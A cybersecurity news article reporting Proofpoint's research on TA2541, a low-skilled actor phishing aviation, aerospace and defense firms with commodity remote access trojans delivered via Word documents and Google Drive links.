For years, a low-skilled attacker has been deploying off-the-shelf software in harmful campaigns directed at businesses in aviation and other critical industries. This threat actor has been targeting companies in the aviation, aerospace, manufacturing, transportation, and defense industries since at least 2017. The attacker, codenamed TA2541 by cybersecurity firm Proofpoint, is thought to be based in the United States.
Proofpoint states in recently-released research that TA2541 has remained constant in its attack strategy, depending on infected Microsoft Word documents to deploy a remote access tool (RAT). This group’s usual malware campaign entails sending “hundreds to thousands” of emails, primarily in English, to “hundreds of organizations globally, with recurring targets in North America, Europe, and the Middle East.” According to Proofpoint experts, the organization recently transitioned from infected attachments to connecting to a payload housed in cloud services like Google Drive.
TA2541 does not employ bespoke software but rather generic malware that can be purchased on cybercriminal forums. As per the researcher’s findings, AsyncRAT, NetWire, WSH RAT, and Parallax appear to be the group’s top favorites, being pushed often in malicious messages. Proofpoint emphasizes that all malware employed in TA2541 campaigns may be used to collect information, although the threat actor’s final purpose is unknown at this time.
“In recent campaigns, Proofpoint observed this group using Google Drive URLs in emails that lead to an obfuscated Visual Basic Script (VBS) file. If executed, PowerShell pulls an executable from a text file hosted on various platforms such as Pastetext, Sharetext, and GitHub” – Proofpoint.
The attacker then injects PowerShell into several Windows processes and queries the Windows Management Instrumentation (WMI) for accessible security solutions. After then tries to deactivate the host’s built-in defenses and begins gathering system information before downloading the RAT payload. Given TA2541’s target selection, its activity has not gone undetected, and security experts from other firms have previously examined its campaigns [1, 2, 3], but without concluding that all of the dots have been connected.
Last year, Cisco Talos released a report on a TA2541 campaign that used AsyncRAT to target the aviation industry. According to the experts, the actor has been active for at least five years. Cisco Talos created a profile for the threat actor based on information from studying the infrastructure employed in the attack, which linked its physical location to Nigeria.
The actor can send thousands of emails to dozens of organizations in a single campaign, and they are not targeted for specific jobs. This further supports the hypothesis of a non-skilled actor by demonstrating that TA2541 is unconcerned with the stealth of its acts. Thousands of businesses have been attacked in these “spray-and-pray” attacks. Still, enterprises in the aerospace, aviation, manufacturing, transportation, and defense industries appear to be a persistent target worldwide.
Even though TA2541’s tactics, methods, and procedures (TTPs) indicate a low-tech opponent, the actor has been able to run harmful activities for almost five years without raising too many red flags.